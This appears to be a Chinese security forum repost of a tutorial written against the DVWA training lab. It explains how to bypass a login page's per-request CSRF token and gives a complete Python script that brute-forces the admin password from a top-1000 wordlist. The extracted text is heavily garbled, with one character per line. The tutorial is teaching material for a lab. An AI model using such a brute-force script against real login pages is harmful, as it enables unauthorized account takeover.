论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
Web安全
[26709] 2021-04-04_编写有CSRF后台验证的登录框密码穷举脚本
文档创建者:
s7ckTeam
浏览次数:
2
最后更新:
2025-01-19
Web安全
2 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前在线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-04-04_编写有CSRF后台验证的登录框密码穷举脚本
1
2
编
写
有
C
S
R
F
后
台
验
证
的
登
录
框
密
码
穷
举
脚
本
m
o
o
n
s
e
c
m
o
o
n
s
e
c
2
0
2
1
-
0
4
-
0
4
p
y
t
h
o
n
3
编
写
编
写
E
X
P
系
列
系
列
编
写
有
编
写
有
C
S
R
F
后
台
验
证
的
登
录
框
密
码
穷
举
后
台
验
证
的
登
录
框
密
码
穷
举
D
V
W
A
靶
场
D
V
W
A
靶
场
这
个
是
最
基
础
的
靶
场
如
果
想
学
习
E
X
P
编
写
这
个
靶
场
最
好
不
过
,
如
果
能
把
这
个
靶
场
的
利
用
的
E
X
P
用
p
y
t
h
o
n
3
编
写
出
来
这
样
算
是
合
格
的
e
x
p
入
门
选
手
了
。
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
d
i
g
i
n
i
n
j
a
/
D
V
W
A
编
写
登
录
穷
举
E
X
P
这
个
页
面
是
d
v
a
w
的
登
录
页
面
,
使
用
b
u
r
p
s
u
i
t
e
抓
包
页
面
无
论
正
确
与
否
都
会
返
回
3
0
2
u
s
e
r
n
a
m
e
=
a
d
m
i
n
&
p
a
s
s
w
o
r
d
=
p
a
s
s
w
o
r
d
&
L
o
g
i
n
=
L
o
g
i
n
&
u
s
e
r
_
t
o
k
e
n
=
1
4
b
5
2
d
3
d
f
b
9
a
5
2
5
4
8
8
3
8
5
f
9
5
3
0
3
9
5
d
d
f
如
果
密
码
不
正
确
的
情
况
下
再
次
提
交
会
有
c
s
r
f
错
误
信
息
3
这
个
页
面
很
显
然
做
了
c
s
r
f
限
制
。
导
致
不
能
多
次
提
交
密
码
。
绕
过
c
s
r
f
限
制
每
次
访
问
页
面
这
个
u
s
e
r
_
t
o
k
e
n
都
会
变
化
导
致
不
能
重
复
提
交
。
验
证
原
理
每
次
页
面
生
成
u
s
e
r
_
t
o
k
e
n
存
在
s
e
e
s
i
o
n
里
面
每
次
登
录
用
s
e
s
s
i
o
n
里
取
出
来
然
后
验
证
如
果
验
证
成
功
就
进
行
密
码
匹
配
。
如
果
验
证
不
成
功
就
输
出
c
s
r
f
错
误
。
4
简
单
逻
辑
表
现
i
f
(
c
s
r
f
=
=
c
s
r
f
)
{
I
f
(
p
a
s
s
w
r
o
d
=
=
p
a
s
s
w
o
r
d
)
{
执
行
代
码
}
}
e
l
s
e
{
c
s
r
f
出
错
}
编
写
b
u
r
t
e
_
l
o
g
i
n
#
c
o
d
i
n
g
:
u
t
f
-
8
i
m
p
o
r
t
r
e
q
u
e
s
t
s
i
m
p
o
r
t
r
e
u
r
l
=
"
h
t
t
p
:
/
/
w
w
w
.
d
v
w
a
.
c
o
m
/
l
o
g
i
n
.
p
h
p
"
d
e
f
l
o
g
i
n
(
p
a
s
s
w
o
r
d
)
:
s
e
s
s
i
o
n
=
r
e
q
u
e
s
t
s
.
s
e
s
s
i
o
n
(
)
r
e
q
=
s
e
s
s
i
o
n
.
g
e
t
(
u
r
l
)
u
s
e
r
_
t
o
k
e
n
=
r
e
.
s
e
a
r
c
h
(
"
[
a
-
z
0
-
9
]
{
3
2
}
"
,
r
e
q
.
t
e
x
t
)
.
g
r
o
u
p
(
0
)
#
3
2
m
d
5
d
a
t
a
=
{
"
u
s
e
r
n
a
m
e
"
:
"
a
d
m
i
n
"
,
"
p
a
s
s
w
o
r
d
"
:
p
a
s
s
w
o
r
d
,
"
L
o
g
i
n
"
:
"
L
o
g
i
n
"
,
'
u
s
e
r
_
t
o
k
e
n
'
:
u
s
e
r
_
t
o
k
e
n
}
r
e
q
=
s
e
s
s
i
o
n
.
p
o
s
t
(
u
r
l
=
u
r
l
,
d
a
t
a
=
d
a
t
a
,
a
l
l
o
w
_
r
e
d
i
r
e
c
t
s
=
T
r
u
e
)
h
t
m
l
=
r
e
q
.
t
e
x
t
r
e
t
u
r
n
h
t
m
l
w
i
t
h
o
p
e
n
(
'
t
o
p
1
0
0
0
.
t
x
t
'
)
a
s
p
:
p
a
s
s
l
i
s
t
=
p
.
r
e
a
d
l
i
n
e
s
(
)
p
.
c
l
o
s
e
(
)
f
o
r
l
i
n
e
i
n
p
a
s
s
l
i
s
t
:
l
i
n
e
=
l
i
n
e
.
s
t
r
i
p
(
"
n
"
)
p
r
i
n
t
(
l
i
n
e
)
i
f
'
F
i
l
e
U
p
l
o
a
d
'
i
n
l
o
g
i
n
(
l
i
n
e
)
:
p
r
i
n
t
(
"
[
*
密
码
i
s
%
s
*
]
"
%
l
i
n
e
)
b
r
e
a
k
5
关
注
公
众
号
本
公
众
号
不
定
期
更
新
欢
迎
前
来
关
注
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
Web安全